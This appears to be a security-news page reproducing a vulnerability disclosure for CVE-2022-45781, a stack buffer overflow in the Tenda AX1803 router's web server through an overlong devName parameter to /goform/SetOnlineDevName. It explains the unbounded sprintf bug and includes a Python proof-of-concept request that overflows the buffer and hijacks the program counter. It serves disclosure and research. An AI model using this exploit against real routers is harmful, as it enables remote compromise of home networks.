Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-45781: Tenda AX1803 Buffer Overflow vulnerability . - XFALLEN

Buffer Overflow vulnerability in Tenda AX1803 v1.0.0.1_2994 and earlier allows attackers to run arbitrary code via /goform/SetOnlineDevName.

CVE
#vulnerability#web#mac#windows#apple#buffer_overflow#auth#chrome#webkit#wifi

stack buffer overflow in tdhttpd in Tenda AX1803 1.0.0.1_2994 and earlier allows remote authenticated users to remote code excution via SetOnlineDevName request****Overview

type: Buffer Overflow vulnerability

Manufacturer : Tenda( (https://www.tenda.com.cn/)

Product: WiFi router ax1803

Firmware download address : https://www.tenda.com.cn/download/detail-3421.html

Product Information:Tendaax1803 router adopts WiFi 6 (802.11ax) technology, and the dual band concurrency rate is up to 1775mbps (2.4ghz:574mbps, 5ghz:1201mbps). Compared with the ac1200 router of the previous generation WiFi 5 standard, the wireless rate is increased by 50% and the transmission distance is longer; Equipped with 1.5GHz high-performance quad core processor, the network load capacity is comprehensively improved, data forwarding is faster, and long-term operation is more stable; Using ofdma+mu-mimo technology, more devices can access the Internet at the same time, the transmission efficiency is significantly improved, the delay is significantly reduced, and the online games and ultra clear videos for multiple people are more fluent. It is the first choice for building a multimedia home network!

Overview of the latest version router simulation of Tenda AX1803 v1.0.0.1_2994

Vulnerablity details

Download the firmware and decompress it, use Binwalk -e to extract filesystem

The vulnerability lies in rootfs_In /goform/SetOnlineDevName function of /bin/tdhttpd in ubif file system. attackers can access http://routerip/goform/SetOnlineDevName , and setting a very long DevName parameter to trigger stack buffer overlow, the stack buffer overflow can be caused to achieve the effect of router remote code excution and can obtain a stable root shell through a carefully constructed payload

Request can be found in this place:

As we can see devName section in POST request.

formSetDeviceName function (/bin/tdhttpd) call a function to bond device name with mac information, this function is vulnerable to buffer overflow.

In the “set_name_with_mac” function, devName is copied into v9 array through sprintf function with format arg "%s;1", this means sprintf would copie all the content in devName and there is no length limitation for devName.
The v9 array is defined in here. The length of array is 256 bytes, if the devName’s length longer than v9 would cause buffer overflow

Recurring vulnerabilities and POC

In order to reproduce the vulnerability, the following steps can be followed:

  1. Boot the firmware by qemu-system or other ways (real machine)

  2. Attack with the following POC attacks

    #!/usr/bin/env python3 import requests,sys from pwn import *

    replace ip address here

    url = “http://192.168.10.1/goform/SetOnlineDevName” payload = ‘a’ * 0x100

    payload = "mac=00:00:00:00:00:01&devName=%s&nodeName=mainNode"%payload content_length = len(payload) header = { "Host":"192.168.10.1", "X-Requested-With":"XMLHttpRequest", "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36", "Content-Type":"application/x-www-form-urlencoded; charset=UTF-8", "Origin":"http://192.168.10.1", "Content-Length":"%d"%content_length, "Connection": "close", "Cookie": “password=bcf33de30ebf57e4d3785c08adec4b85cvztgb” # Note to replace the password field in the cookie }

    r = requests.post(url, headers=header, data=payload)

result:
As you can see below, PC register is hijacked with payload. By constructing a payload, this can also get a stable root shell

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907